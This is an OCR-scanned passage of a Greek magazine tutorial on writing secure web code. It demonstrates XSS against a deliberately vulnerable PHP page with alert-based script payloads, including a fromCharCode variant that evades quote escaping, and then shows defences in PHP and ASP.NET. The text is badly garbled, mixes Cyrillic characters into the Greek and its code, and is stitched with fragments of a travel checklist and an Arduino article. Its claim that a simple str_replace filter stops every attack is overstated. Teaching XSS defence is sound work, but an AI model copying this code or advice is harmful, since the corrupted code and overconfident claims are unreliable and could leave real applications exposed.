CHECK LIST 
" WHAT TO BRING: 


mem 
ZUPPA) 
ασφαλούς 
ОПОТ 


bu Thiseas 
cnm αὶ = e = шш шы шы шы ша шш L" 


| 


Στο прото μέρος rou μίνι αφιερὠματός pac, : 
που αρχίζει апо τη σελίδα 12, μάθαμε пос І 
θα μπορέσουμε va δυσκολέψουμε -av ὀχι να I 
αποτρέψουµε- то £pyo ενὸς επιτήδειου που 
προσπαθεἰ va µας επιτεθεί µε SQL Injection. | 
Επἰσης кауан= kai την παραδοχή, µε την οποία δεν 
διαφωνήσατε και ара θεωρούμε ὀτι συμφωνείτε І 
anóAurg, ὁτι για όλα φταίνε οι προγραμματιστές! i 
Άλλωστε ποιος фтаі órav σου κλέβουν ro σπίτι 
επειδἠ ξέχασες την πόρτα ανοιχτή; E; Το ζητούμενο { 
Aoinóv εἶναι va κλειδώνουμε το спїтї µας ὅσο nio " 
καλά μπορούμε... | 


- ши ша шш шш шш шш шш 
5. AVOID ALCOHOLIC 
BEVERAGES. CONSUME 


να LITTLE FOOD AND DRINK. 
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Εκτὸς anó rnv χιλιοειπωμένη και καλοπαιγμένη επίθεση του SQL Injection, 
нє Вара καρδιὰ ἑστω πρέπει να δεχτούμε ὁτι υπάρχουν πολλὲς ἄλλες, 
μάλιστα πιο поупрёс και μερικὲς φορὲς πιο επώδυνες! О επιθέσεις αυτὲς 
δεν απαιτούν καν την ύπαρξη µιας βάσης δεδομένων. Θα τολμήσουμε va 
πούμε бт! η διασημότερη απ’ αυτὲς εἶναι η επίθεση Cross Site Scripting 
ἡ, πιο σύντομα, XSS. Εὐλογα ropa θα ρωτήσει κάποιος: Και γιατὶ na- 
ρακαλώ δεν τη λέτε CSS; Μα, yia v' αποφύγουμε την παρεξήγηση µε 
τα Cascading Style Sheets, που εν συντομία ονομάζονται CSS (http:// 
en.wikipedia.org/wiki/Cascading Style Sheets). Εξάλλου το X, στο Χ55, 
μοιάζει µε σταυρὀ, δηλαδή ue cross! Και στην τελικἠ, пос να το κάνουμε; 
To X συμβολίζει καλύτερα τη διασταύρωση και τη βίαιη εισαγωγἠ шас 
γραμμὴς κὠδικα µέσα σε µια ἄλλη (αυτή εἶναι η ουσία του Cross Site 
Scripting). Apkerà όμως µε την парла. 


XSS και PHP 

Δείτε τον ακὀλουθο κὠδικα PHP, των δύο γραμμών: 
«?php 
$name = $ GET["name"]; 
echo "Hello $name"; 


?» 


| C httpil/locslhost/te.. S. php?namezThiseas | + | 


(€)? ЕЗ | | C3 localhost/tests/SafeXSS.php?name- Thiseas Y БМ | el | "- Google 5 | Ф. 


Hello Thiseas 


О κώδικας που 
γράψαμε yia τον 
server µας μοιάζει 
απλὀς, ακίνδυνος 
και Ιδιαίτερα φιλι- 
κόὀς! Και πράγματι 
εἶναι φιλικός, όµως 
*kai* προς τους 
επιτιθέµενους... 
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Αυτός о κὠδικας διαβάζει το ὀνομα που δηλώνει ο χρήστης µέσα апо το 
URL και τυπώνει vav σύντομο χαιρετισμὸ (εικόνα 1). Ωραίο και απλὀ 
προγραμματάκι, μόνο nou περιἐχει µια σηµαντικἠ αδυναμία: Επιτρέπει то 
XSS! Αναρωτιἑστε γιατὶ; Διότι πολύ απλά η µεταβλητή $name λαμβάνει 
την τιμὴ της апо το χρήστη και χρησιμοποιείται άμεσα, χωρίς να ἐχει 
ελεγχθεὶ ἡ va ἐχει γίνει sanitized! Μεγάλο σφάλμα! Αν ελέγξετε ποτέ KW- 
δικα! για τρύπες ασφαλείας, να ἐχετε στο μυαλὸ σας αυτόν τον πολὺ απλό 
алла πολύτιμο κανόνα: Οποιαδήποτε µεταβλητἠ παἰρνει την τιµή της апо 
το χρήστη εἶναι ύποπτη και πρέπει να φιλτραριστεἰ, ασχέτως av xpnoipo- 
ποιήθηκε η μέθοδος GET, η POST ἠκάποιο HEADER (http header fields: 
ὁπως ro Referrer, ro User Agent k.à.). Ας δούμε ὁμως ἑνα παράδειγµα 
επίθεσης XSS. Ας υποθέσουμε бт! ο κὠδικας PHP nou εἶδαμε προηγουμέ- 
νως εκτελείται с’ £vav web server, топіка. Av για εκπαιδευτικούς λόγους 
θέλαμε va επιτεθούµε στο μηχάνημά µας, θα δίναμε ἑνα URL σαν αυτό: 


Localhost/tests/SafeXSS.php?name-«script»alert('Hello 
deltaXAKA') ; «/script» 


Σ’ auró ro παράδειγµα χρησιμοποιούμε τη μεταβλητή name, yia va φυτέ- 
Ψουµε παράνομα κὠδικα σε Javascript! О κὠδικας αυτός θα μεταφερθεί 
στον server κι апо εκεἰ θα επιστρέψει στον browser µας, yia va εκτελε- 
στεἰ κανονικότατα! Αν δεν µας πιστεύετε, δείτε την εικὀνα 2 ;) Κατά τη 
διαδικασία rou rendering o browser εμφάνισε τα περιεχόμενα της µετα- 


1. Eire тоу δικὀ σας eire ἄλλων (βλέπε Open Source projects, code reviewing κ.ο.κ.) 


Συγγραφή ασφαλούς κώδικα (Part 2 of 


P 


Hello DeltaXAKA 


бакы) 


Transferring data from localhost... 


βλητής name και γενικότερα ὁσα rou ἐστειλε o server. Τα περιεχόμενα 
της µεταβλητής, ὅμως, ἦταν κὠδικας σε Javascript! Φυσικά, ο browser 
δεν χειρίστηκε το περιεχόμενο της μεταβλητής σαν ша σειρὰ απλὼν xa- 
ρακτήρων αλλά σαν κὠδικα, τον οποίο ένιωσε την υποχρέωση να EKTE- 
λέσει. Αυτά εἶναι! 


Πα την αντιμετώπιση αυτής της επίθεσης πρέπει να εξασφαλίσουµε От! 
ο browser δεν θα χειριστεί το περιεχόμενο της μεταβλητής $name σαν 
κώδικα, αλλά σαν µια απλἠ συμβολοσειρά. Ὅμως τι ἠταν αυτό nou ἑκα- 
νε TOV Web browser να θεωρήσει бт! ο server rou ἐστειλε κὠδικα; Ένας 
επιπόλαιος χρήστης θα απαντούσε бт! φταίνε ra μονά quote, εντὸς των 
οποίων περικλείεται το μήνυμα "Hello deltaXAKA". Έτσι, ο пароррптікёс̧ 
(εκτὸς апо επιπόλαιος) φίλος µας θα άλλαζε τον κὠδικα και θα τον kave 
κάπως ἐτσι: 


<?рһр 
function Sanitized($Input) 
{ 
return (get magic quotes gpc()) ? 
mysql real escape string(stripslashes($Input)) : 
mysgl real escape string($Input); 
} 


$link = mysql connect('localhost', 'тупате', 'mypass') OR die(mysql 
error()); 


$name - Sanitized($ GET["name"]); 
echo "Hello $name"; 
?> 


Με αυτἐς τις npoo8r|kec, o κὠδικας ψάχνει va βρει μονά quote κι ónou та 
συναντήσει βάζει μπροστὰ τους éva backslash (X) και τα απενεργοποιεί 
(κάνει το λεγόμενο escaping). Με αυτή την τροποποἱηση το παράδειγµα 
επίθεσης που εἶδαμε παραπάνω δεν θα πετύχαινε! Έτσι, το φιλαράκι µας 
θα νόμιζε ότι ξεμπέρδεψε µε ro ενοχλητικὀ XSS. Σωστά; Φυσικά και ὀχι! 
Χωρίς πολλά λόγια, πάμε να δούμε ἑνα ακόµα παράδειγµα επίθεσης, xw- 
pic μονά quotes και µε παρόμοιο αποτέλεσμα: 


«script»alert(String.fromCharCode(88,83,83,33));«/script» 


2. Αυτός ο client βρε пабі µου, έχει τυφλἠ εμπιστοσύνη στον server. Σας θυμίζει κάτι αυτή η τυφλἠ εµΠΙστο- 
обуп; Μήπως και то ARP poisoning στην αρχή TNG τυφλἠς εμπιστοσύνης δεν βασίζεται; Χμ, ενδιαφἐρουσα αρχή! 


О επιτιθέμενος 
φύτεψε παράνομο 
κώδικα που μοιάζει 
να προέρχεται απὀ 
TOV Web server пас 
KI εκτελείται στο 
web browser φυσι- 
ολογικὀτατα... 
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localhost/tests/SafeXSS.php?name=<script> alert(String fromCharCode(88,83,83,33));</script> Т ~ | D | Җ |[Ф@- Googie 


Transferring data from localhost... 


Κόψαμε та μονά 
quotes, αλλά δεν 
кошаџ και TIG 
επιθέσεις Χ55. 
Αυτές μπορούν 
ακόμα να συνεχι- 
στούν, µε µια απλή 
κωδικοποίηση των 
μηνυμάτων... 
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To "88,83,83,33" αποτελεὶ µια κωδικοποιημένη σειρὰ χαρακτήρων και η 
συνάρτηση String.fromCharCode() χρησιμοποιείται για την αποκῶδικο- 
noinor| της. Οἱ αριθμοί 88,83,83,33 αποτελούν τους κωδικούς ASCII των 
χαρακτήρων rou “Х55!”. Στην εικόνα 3 µπορείτε να δείτε το αποτέλεσμα. 
Eivai ξεκάθαρο бт! η απενεργοποΐηση των μονών quote δε µας проота- 
τεύει. Ας επιστρἐψουµε καλύτερα ото αρχικὀ µας ερώτημα: Τι εἶναι αυτό 
που κάνει тоу web browser να θεωρήσει бт! о server TOU στέλνει κώδικα; 
Μα, φυσικἀ, τα εξἠς δύο tag: «script» και </script>. Μήπως θα nps- 
πε va απομονώσουμε τους χαρακτήρες “<” και “>”; Με auróv τον TpÓ- 
no θα απενεργοποιούσαμε και τον κὠδικα σε Javascript алла κι εκείνον 
σε HTML, που ενδέχεται να “φυτέψει” κάποιος σε uia μεταβλητή. Ti θα 
λέγατε Aoinóv να φτιάχναμε µια συνάρτηση µε то ὀνομα SanitizedXSS, 
η οποία θα κατακεραυνώνει ὀποιον επιτἠδειο χρησιµοποιεἰ τα σύμβολα 
“<” και “>”, διοχετεύοντας апо το πληκτρολόγιο ρεύμα 1000A; Oa εἶχε 
плака, αλλά υπάρχει ο κίνδυνος va την πληρώσουν κι αθώοι. Μπορούμε 
όμως να κάνουμε кат! nio συνετὀ: Να γράψουμε µια συνάρτηση που θα 
τροποποιεἰ κατάλληλα τους δύο επικίνδυνους χαρακτήρες, ὥστε να µη 
λειτουργεί κανένα tag εντὀς µιας μεταβλητής. О απλούστερος τρόπος για 
να πετύχουμε κάτι τέτοιο εἶναι να μετατρέψουμε το “<” στο αντίστοιχο 
HTML entity "&lt;", καθὼς και το “>” στο "&gt;". Αυτή η προσέγγιση ἐχει 
το кало ὁτι κατὰ ro rendering οι χαρακτήρες θα εμφανίζονται κανονικά 
(δεν θα χαθούν οὐτε θα αλλοιωθούν), αλλά σαν απλὀ κείμενο κι ὀχι ως 
tags! Ας δούµε τη συνάρτηση που κάνει τα παραπάνω, μαζί pe ric anapai- 
τητες αλλαγἐς που πρέπει va κἄνουμε στον αρχικὀ µας κὠδικα: 


«?php 
function SanitizedXSS($Input) 
{ 
return str replace('«',"&lt;",str replace(^', "&gt;", $Input)); 
} 
$name = SanitizedXSS($ GET["name"]); 
echo "«p» Hello $name"; 
?» 


Μετά τις παραπάνω προσθἠκες/τροποποιήσεις o κὠδικας εἶναι προστα- 
τευμένος апо κάθε επίθεση σαν αυτὲς που εἰδαμε στο παράδειγμα. Па 
του λόγου το αληθές, ρἰξτε µια ματιὰ στην εικὀνα 4. О κὠδικας που φυ- 
τἐψαµε στη μεταβλητή $name τυπώθηκε ως απλὀ κείμενο και δεν EKTE- 
λέστηκε! 


Πρέπει να σας πούμε бт! δοκιμάσαμε την παραπάνω μέθοδο προστασίας 


Συγγραφή ασφαλούς κώδικα (Part 2 of 2) 


P 


απέναντι σε éva μεγάλο πλήθος επιθέσεων XSS (που δίνονται απὀ ro 
γνωστὸ site http://ha.ckers.org/xss.html) και µας έβγαλε ασπροπρὀσω- 
πους! Δεν εμφανίστηκε καμία αδυναμία! Πρέπει ὁμως να σας πούμε και 
κάτι ἄλλο: Με боа εἰδαμε, καταφέραμε μόνο να ξύσουµμε την επιφάνεια 
του XSS. Ουσιαστικἀ, δώσαμε μόνο μερικὰ hints κι ελπίζουμε να σας 
εμπνεύσαμε αρκετά, WOTE να αρχίσετε να το ψάχνετε και μόνοι σας. Ἀλ- 
λωστε η τεχνικἠ που εἶδαμε μπορεί να εἶναι αποτελεσµατικἠ órav ο пара- 
νομος κὠδικας ἐρχεται µέσω µιας µεταβλητής, αλλά ενδέχεται να ἐρχεται 
και µέσω µιας εικόνας ἡ εντὸς του κὠδικα HTML. Σε τέτοιες περιπτώσεις 
µπορείτε να χρησιµοποιείτε ειδικἀ φίλτρα алла και βιβλιοθήκες anti-XSS, 
που θα βρεἰτε ἐτοιμες στο διαδίκτυο. Па αρχἠ, μπορείτε να ρἰξετε µια 
ματιὰ σε µια γνωστὴ βιβλιοθήκη του εἶδους (avri-XSS), που ονομάζεται 
SafeHTML Anti-XSS filter και χρησιµοποιείται полу συχνά: 


http://bit.ly/SafeHTMLantiXSS 


Πρόκειται yia ἑναν parser nou µπορείτε va χρησιμοποιήσετε για va φιλ- 
τράρετε ολόκληρες σελίδες σε HTML, όταν αυτές προέρχονται апо Kå- 
ποιον client. Ας δούµε όμως μερικὲς ακόµα λύσεις. 


e  ToReformProjectrou OWASP (http://bit.ly/OWASPencodingProject) 
αποτελεί µια пара πολύ καλἠ και δωρεὰν λύση! Πρόκειται για µια 
ἑτοιμη κλάση που παρέχεται σε διάφορες εκδοχές, για τις περισσὀ- 
τερες γλὠσσες (ASP.NET, HTML, javascript, PHP к.а). Για την PHP, то 
μόνο που χρειάζεται να κατεβάσουμε εἶναι ёха αρχείο. Δείτε то кро 
μας πρὀγραμµα, τροποποιημένο ὥστε να χρησιμοποιεί το Reform: 


«?php 

mb internal encoding("UTF-8"); 

include('Reform.inc.php!); 

$reform - new Reform; 

$name - $reform-»HtmlEncode($ GET["name"]); 

echo "«p» Hello $name"; 

2» 
H συγκεκριμένη κλάση προβλέπει τη μετατροπή όλων των χαρακτή- 
pov Unicode σε UTF-8. Κατ’ auróv τον τρόπο εἶναι πλέον εφικτὸς о 
ἐλεγχος καθενὸς χαρακτήρα χωριστὰ κι ο εντοπισµὀς των επικἰνδυ- 
νων. Χωρίς αυτή τη μετατροπή θα ἠταν σχεδὸν αδύνατον να npo- 
βλεφτούν ὁλοι οι δυνατοί χαρακτήρες, για όλα τα δυνατὰ encodings, 
όλων των γλωσσών του πλανήτη! 

e Ηβιβλιοθήκη php-AntiXSS (http://code.google.com/p/php-antixss) 
αποτελεί µια επίσης καλἠ λύση, που μπορείτε να χρησιµοποιείτε δω- 
рау. Н λειτουργία της στηρἰζεται στη συνάρτηση preg_match καὶ σε 
δύο λίστες µε επιτρεπτοὺς (white-listed) κι απαγορευµένους (black- 
listed) χαρακτήρες ἡ συμβολοσειρὲς. Έτσι, καταφέρνει να anopovo- 
сє και να αντιμετωπίσει κατάλληλα οποιοδήποτε επικίνδυνο xapa- 
κτήρα ἡ string. 


XSS και ASP.NET 


Το πρόγραµµα nou εξετάσαµε νωρἱτερα για τις δοκιμές µας θα pno- 
ρούσε va γραφτεὶ και σε VB.NET. Ας rou ρἰξουμε µια ματιά... 
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Partial Class _Default 
Inherits System.Web.UI.Page 


Protected Sub Page_Load(ByVal sender As Object, ByVal e As 
System.EventArgs) Handles Me.Load 


Dim name As String 
If Request.QueryString("name") Is Nothing Then 
Return 
End If 
name = Request.QueryString("name").ToString 
Response.Write("Hello " + name + "<br />") 
End Sub 
End Class 


H Microsoft ἐχει κάνει калд δουλειά στον τοµέα nou εξετάζουμε. Εμείς 
δεν χρειάζεται να κάνουμε πολλά, αφού στο «ΝΕΤ υπάρχουν ενσωµα- 
τωμένοι ἐλεγχοι για επιθέσεις XSS. Μόλις γίνει αντιληπτή µια απόπειρα 
επίθεσης XSS η рой του προγράµµατος διακόπτεται και εμφανίζεται va 
σχετικὀ μήνυμα. Στην εικὀνα 5 µπορείτε να δείτε τι συνέβη отау δοκι- 
μάσαμε ша απλἠ επίθεση. Ουσιαστικά, κάνοντας τη δοκιµαστικἠ επἰθε- 
ση ανέλαβε δράση ο λεγόμενος Request Validator, ο οποίος ελἐγχει την 
εκτέλεση του κὠδικα σε κάθε request που γίνεται апо τον client προς τον 
server (http://msdn.microsoft.com/library/ms998274.aspx). Φυσικά, o 
Request Validator ενεργοποιείται ἡ απενεργοποιείται апо το αρχείο web. 
config και συγκεκριµένα anó ro tag system.web: 


«system.web» 
«pages buffer-"true" validateRequest-"true" /» 
«/system.web» 


Oa rjrav φρόνιμο va ελἐγχετε πάντα αν αυτἠ η eniAoyr| εἶναι ενεργή! Av 
δεν την βρείτε στο web.config, κοιτάξτε στο machine.config. Εξ ορισμού 
πάντως η Microsoft την έχει ενεργοποιημένη -- και кала κάνει. Γενικά, 
όταν γράφουμε κὠδικα για τον server σε VB ἡ C£, η Microsoft προτείνει 
(κι έχει δίκιο!) να ακολουθούμε τους εξἠς δύο απλούς κανόνες: 


e Κανόνας 1. Κωδικοποιεῖτε τον κὠδικα HTML. Αν χρειαστεἰ va δη- 
µιουργήσετε δυναμικὰ κὠδικα HTML και δεν γνωρίζετε εξαρχἠς 
ποια tag θα χρησιμοποιηθούν, αξιοποιείστε τη μέθοδο HttpUtility. 
HtmlEncode. Πα παράδειγµα, ο κὠδικας του προγρἀμματὸς µας θα 
άλλαζε στη γραμμή ónou παράγεται η “απάντηση” προς rov client και 
θα γινόταν κάπως ἐτσι: 


Response.Write("Hello " + HttpUtility.HtmlEncode(name); 


e Κανόνας 2. Κωδικοποιείτετο URL. Αν γράφετε κὠδικα που επιστρέ- 
φει κάποιο URL, τότε αν κἀποιο μέρος αυτού κὠδικα επηρεάζεται 
апо rov client θα πρέπει να χρησιμοποιήσετε τη µἐθοδο HttpUtility. 
UrlEncode. Πα παράδειγµα, αν το πρὀγραμμά µας επιστρέφει ως anà- 
ντηση προς το χρήστη ἑνα URL, θα έπρεπε να ακολουθήσουμε την 
παρακάτω σύνταξη: 


Response.Write(HttpUtility.UrlEncode(urlString)); 


Συγγραφή ασφαλούς κώδικα (Part 2 of 2) 


ЕЕЕ ССС ССС 


if^ 


TOC o Goe e απΡ 
[Z] http://localhost/tes.33));%3C/script%3E 


(€) э ж | c localhost/tests/SafeXSS.php?name- < script» alert(String.fromCharCode(88,83,83,33)); </script> Yr X e | @ 


Hello «script»alert(String отСћһагСоде(88,83.,83,33));</ѕсгірё> 


Session hijacking kai cookie theft Επιτέλους τα 
καταφέραμε! О 

Μία πολὺ συχνἠ επίθεση που συνδυάζεται µε ro XSS, εἶναι аотй της αλ- παράνομος κὠδικας 

λαγἠς (hijacking) ἡ της κλοπής των session cookies (cookie theft). Όταν δεν εκτελέστηκε 

κάνουμε login σε κάποιο site πολύ συχνά αποθηκεύεται στον υπολογιστή ο. 

μας ¿va cookie, ὡστε το site va µας θυμάται και να µη δίνουμε κἆθε Ліүо εμφανίστηκε бау: 

TO Username kai то password. Auró ro cookie περιἐχει διάφορες пАпро- συμβολοσειρά... 

φορίες, ανάμεσα στις οποίες περιλαμβάνονται συχνὰ και τα δικαιώματα 

που έχουμε στο site. Αν, δηλαδή, εἰμαστε απλοί χρήστες ἡ διαχειριστὲς 

κ.ο.κ. Αν κἀποιος καταφέρει να πάρει auró ro cookie kai να то βάλει στον 

δικὀ του υπολογιστή, τότε о server θα τον αναγνωρίσει σαν να ἡμασταν 

εμεὶς kai θα του συμπεριφερθεὶ ανάλογα. Αν δηλαδἠ εἰμαστε διαχειριστὲς 

και µας ἐχει πάρει το cookie, θα μπει κι αυτός ως διαχειριστής! 


Οι προγραμματιστές, λοιπὸν, θα πρέπει να προσέχουν πολύ τον τρόπο µε 
τον onoio κατασκευάζονται τα session cookies апо τα προγρἀμματά τους. 
Айта δεν θα πρέπει σε каша περίπτωση να λειτουργούν σε οποιοδήποτε 
μηχάνημα κι οποτεδήποτε. Θα πρέπει µε κάποιον τρὀπο να δένονται µε 
τον συγκεκριµένο client και (γιατὶ ὀχι;) για µια προκαθορισμένη, σύντομη 
χρονικἠ περἰοδο. Έτσι, ακόµα κι αν καταφέρει κάποιος va τα υποκλέψει 
δεν θα λειτουργούν στο δικὸ του box και θα του εἶναι εἶναι ἄχρηστα! 
Για παράδειγµα, θα rjrav φρόνιμο ra cookies να περιέχουν πληροφορἱες 
апо rov client, οι οποίες σε κάθε request θα επαληθεύονται yia την op- 
θότητα τους. Πιο συγκεκριµένα, θα μπορούσαν να διατηρούν το ὀνομα 
και την ἐκδοση rou web browser, την IP του χρήστη, rov http referrer, 
ἑναν μοναδικὸ, τυχαίο και πολύ μεγάλο αριθμό που θα προέἐρχεται апо то 
server και πάει λέγοντας. Όλες αυτὲς οι πληροφορἱες θα πρέπει επίσης να 
εἶναι κρυπτογραφημένες, ὥστε να µην εἶναι εὐκολη η τροποποἰἱησή τους 
(tampering). Ας περάσουμε όμως с’ ἑνα παράδειγµα. 


Πολυδιάστατη ταυτοποίηση 


Ας υποθέσουμε бт! ἐχουμε μπει στην τρἀπεζα για να κάνουμε τις πληρω- 
μὲς µας κι αυτή µας ἐχει δώσει éva session cookie µε id 2123. Σκεφτείτε 
τι θα συµβεἰ αν κἀποιος καταφέρει, τη στιγμὴ nou εἶμαστε συνδεμένοι, 
να κλέψει то id του cookie µας. Αν ro cookie δεν περιλαμβάνει κι ἄλλα 
αναγνωριστικἁ στοιχεία θα εἶναι πολύ εὐκολο στον υποκλοπέα να δημι- 
ουργήσει ἑνα νέο cookie, χρησιμοποιώντας то ἴδιο id µε ro δικὀ µας. Σ’ 
αυτή την περίπτωση θα ἐχουμε σοβαρὀ πρὀβλημα: О υποκλοπέας Ва ἐχει 
τα ἴδια δικαιώματα µε εμάς στην τράπεζα κι αυτό, µε άλλα λόγια, σημαίνει 
ότι θα ἐχει πρόσβαση στο λογαριασμό µας! Αν орос τα cookies της тра- 
πεζας εκτὸς απὀ το id διατηρούν και πληροφορίες ὁπως o web browser 
και η διεύθυνση ІР апо την οποία συνδεθήκαμε, ο ὑποκλοπέας θα εἶναι 
αδύνατο να εξαπατἠήσει τον server της τράπεζας. Ακόμα κι αν το πλαστὀ 
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File Edit View 


Server Error in '/AntiXSS' Application. 


A potentially dangerous Request.QueryString value was detected from the client 
(пате= "«script»alert('xss')..."). 
Description: Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt 


to compromise the security of your application, such as а cross-site scripting attack. You can disable request validation by setting validateRequest-false in the Page directive or 
in the configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case. 


Exception Details: System. Web.HttpRequestValidationException: A potentially dangerous Request.QueryString value was detected from the client (name-"«script»alert 
(xss').."). 


Source Error: 


The source code that generated this unhandled exception can only be shown when compiled in debug mode. To 
enable this, please follow one of the below steps, then request the URL: 


1. Add a "Debug-true" directive at the top of the file that generated the error. Example: 


To .NET διαθέτει 
έτοιμους µηχανι- 
σμούς που παρέ- 
χουν Ικανοποιητικἠ 
προστασία апо 
επιθέσεις Χ55. 
Μόλις προσπαθή- 
σαµε να εκτελὲἑ- 
σουµε παράνομο 
κώδικα, ο OXETIKÓG 
μηχανισμός ασφά- 
λειας παρενέβη και 
διέκοψε πλήρως 
την εκτέλεση του 
προγράμματος! 


Favorites Tools 
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http://localhost:5408/AntiXSS/Default.aspx?name= «script»alert(xss');«/script» О ~ BOX @ A potentially dangero... X mm 
— — — — - | 


Help 


cookie ἦταν πανομοιότυπο µε TO бїк© µας, η διεὐθυνσή του υποκλοπέα 
θα εἶναι σίγουρα διαφορετικἠ апо τη δικἠ µας κι αυτό θα χτυπήσει στον 
server της τράπεζας, ο οποίος µε τη σειρἀ του θα αρνηθεί va εξυπηρετἠ- 
сє τα σχετικἁ requests! 


Κανόνες ασφαλείας 


Οι επιθέσεις σαν αυτὲς που περιγρἀψαµε εἶναι γνωστές ως Cross Site 
Request Forgery  (http://en.wikipedia.org/wiki/Cross-site request . 
forgery) και Session Fixation (http://en.wikipedia.org/wiki/Session . 
fixation). Πρόκειται για πολὺ επικἰνδυνες επιθέσεις, οι οποίες εκµεταλ- 
λεύονται την εμπιστοσύνη που ἐχει ο server προς στον εκάστοτε web 
browser. Βλέπετε, σύμφωνα µε τους server πάντα, αν o web browser 
προσφέρει στο server то σωστὸ cookie, о χρήστης εἶναι νόμιμος. Δυστυ- 
XOG, όμως, ὁπως εἰδαμε παραπάνω τα πράγματα δεν εἶναι πάντα τόσο 
апла. Φυσικά, όλα аита δεν σημαίνουν ὅτι η ευθύνη για κἆθε αδυναμία σ’ 
ἑνα σύστημα βαραἰνει αποκλειστικἀ τον προγραμματιστή. Av ο χρήστης 
εἶναι απρὀσεκτος τότε κανένας προγραμματιστής δεν μπορεἰ va τον σὠ- 
σει. Βέβαια το τι οφείλει να κἀνει ο χρήστης θα το εξετάσουμε σε κἄποιο 
ἆλλο арӨро. Στο παρὀν, εξετάζουμε оса прёп να кӣу o проүранна- 
τιστής! Στη συνέχεια, λοιπὸν, θα δούμε συγκεντρωμένους μερικούς KA- 
νόνες που πρέπει να ακολουθεἰ κάθε προγραμματιστής, ὡστε να γράφει 
ασφαλἠ κώδικα. 


1. Οι μεταβλητές µας πρέπει να γἰνονται πάντα sanitized. Ακόμα και 
τα Cookies, τα HTTP Headers και οτιδήποτε µπορεί να προέλθει 
anó τον client, πρέπει επίσης va φιλτράρονται апо µία συνάρτηση 
sanitization... 


2. Н ορθὀτητα των δεδομένων δεν πρέπει να ελέγχεται μόνο απὀ την 
πλευρά του client (για παράδειγµα µε Javascript). Σ΄’ aurr| την nepi- 
πτωση, ο κὠδικας που κάνει τον ἐλεγχο µπορεί να τροποποιηθεἰ апо 
£vav πονηρό χρήστη και να σταλούν δεδοµένα µε ανορθὀδοξο κι £v- 
δεχομένως επιβλαβὲς περιεχόµενο. Τα δεδομένα του χρήστη, Aoinóv, 
θα πρέπει να ελέγχονται πάντα *ка!* στο server. 


3. Ὅταν δημιουργεἰτε εντολὲς SQL δυναμικά, να χρησιμοποιείτε type- 
safe παραμέτρους κι ὀχι παραμέτρους που δέχονται οποιοδήποτε 


Συγγραφή ασφαλούς κώδικα (Part 2 of 


P 


εἶδος δεδοµένων (π.χ., ueragAnrég nou δέχονται *ка* ακἐραιους 
*kar* δεκαδικοὺς *каг* χαρακτήρες). 


4. Ма ελέγχετε πάντα τον κὠδικά σας για προβλήματα ασφάλειας, πριν 
τον δώσετε να βγει live. Χρησιμοποιείστε ειδικἁ προγράμματα επἰθε- 
σης (δωρεἁν και µη) ώστε να ελέγξετε τη γραμμή аниуас των npo- 
γραμμάτων σας. Τέτοια προγράμματα εἶναι ro Nessus, το Nikto, το 
Metaspploit, το sglMap, ro sqlNinja και γενικἀ πολλά προγράμματα 
που περιἐχονται στο BackTrack Linux. 


5. Ποτὲ µην καταχωρείτε ευαἰσθητα δεδομένα (αριθμούς πιστωτικὠν 
καρτών, passwords κ.λπ.) σε µια βάση δεδοµένων και χωρίς κρυπτο- 
γράφηση. 


6. Τόσο ο χρήστης της βάσης δεδομένων ὁσο και ο χρήστης nou ἐχει 
πρόσβαση στον web server (o λεγόμενος web user), πρέπει να ἐχουν 
τα ελάχιστα δυνατὰ δικαιώματα. Στην πράξη, πρέπει να ἐχουν τα 
απολύτως απαραίτητα δικαιώματα ὥστε να λειτουργεί η εφαρμογἠ 
μας. 


7. Ποτὲ µην εμφανἱζετε στον τελικὀ χρήστη ra праүратіка λάθη της 
εφαρµογἠς σας, τα οποία προέρχονται апо κάποιο exception! Επἰσης, 
εἶναι επικἰνδυνο να δίνετε πληροφορίες για τη δομή των καταλόγων 
και των υποκαταλόγων του δίσκου σας. 


8. Πρέπει va «δένετε» ὁσο πιο кала µπορείτε та session cookies µε тоу 
client, για να αποφύγετε Φαινόμενα impersonation. 


9. Ta προγρἀμματά σας θα πρέπει να αρνούνται τα λεγόμενα αδύναμα 
passwords. Ένα δυνατὀ password πρέπει va ἐχει τουλάχιστον 12 χα- 
ρακτἠήρες kai να αποτελείται апо κεφαλαία, πεζά, αριθμούς, ειδικούς 
χαρακτήρες και γιατὶ ὀχι... Ἑλληνικὰ! 


σύνδεσμοι για περαιτερω μελέ τη 
ing: w 5 6. / y/ wasp- е g 
oding: wW.S desha et bilco owasp-secu е cod 


Writing Secure Code: wp. com/books[en/2 3711119 1 
PHP Good Coding: http://inanimatt.com/phptips.htm rR 
MSDN Visual Studio 2008 Secure Coding Guidelines: http: : 
VS2K8SecureCodingGuidelines 
ASP.NET Security Whitepapers: 


OWASP Secure C 


WWW asp.net/learn/whitepapersiisecurlty 


Jaran-tofDevMoreSecute 


ο Applications: nttp:/ 
JWritingSCSE 
g and Exploiting Secu 


Βιβλιογραφία 

g More-Secu 
Secon | 
ker's Handbook: Di 


rosoft? ASP.NET 2 


e Mic 
i mzn.to 


d Edition: nttp://a 
scoverin 


Developin me 


Writing Secure Code, 


The Web Application Hac 
\ H 
И. rity In: nttp://amz 


i ilding Secu 
rity: Building | 
les and practices: http://am 


«.to/BuildingSecurityIn 
e zn.to/SecureCodin8 
Softw 


Secure Coding: Princip 


Sk111: 
intermediate 


Tags: Arduino, 
Games, DIY, 
Programming 


VHAČKER 


Make your own 
Заме ? 
Button 1 Button Z 


bY Finnen? 


as 


by giannoug 


Το κύκλωμα της 
παιχνιδομηχανής 
μας! Όσοι δεν 

το φτιάξατε στο 
πρώτο μέρος του 
άρθρου, καλό θα 
ήταν να το Κάνετε 
тора. Πα µια 
επεξήγηση της λει- 
τουργίας του, ка- 
θώς και τη λίστα µε 
τα εξαρτήματα που 
το συγκροτούν, 
ρίξτε ша ματιά 

στο προηγούμενο 
τεύχος... 
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Πριν ξεκινήσουμε το ὀλο εγχείρημα, έπρεπε να αποφασἰσουµε ποιο nal- 
χνίδι θα υλοποιήσουμε. Υπάρχουν πολλὰ παιχνιδάκια που θα μπορούσε va 
τρέξει µια κονσόλα µε το Arduino. Σχεδὸν όλα ωστόσο, απαιτούν προχω- 
ρημένες γνώσεις στον τομέα του game development και ξεφεύγουν ката 
поло апо τον okonó rou ἀρθρου. 'Eroi, αποφασίσαμε να στραφούμε σε 
κάτι απλὀ. Μήπως υπάρχει κανένας nou δυσαρεστήθηκε θεωρώντας бт! 
δεν θα γράψουμε κὠδικα; Αν υπάρχει, μάλλον βιάστηκε! Το απλὀ παιχνι- 
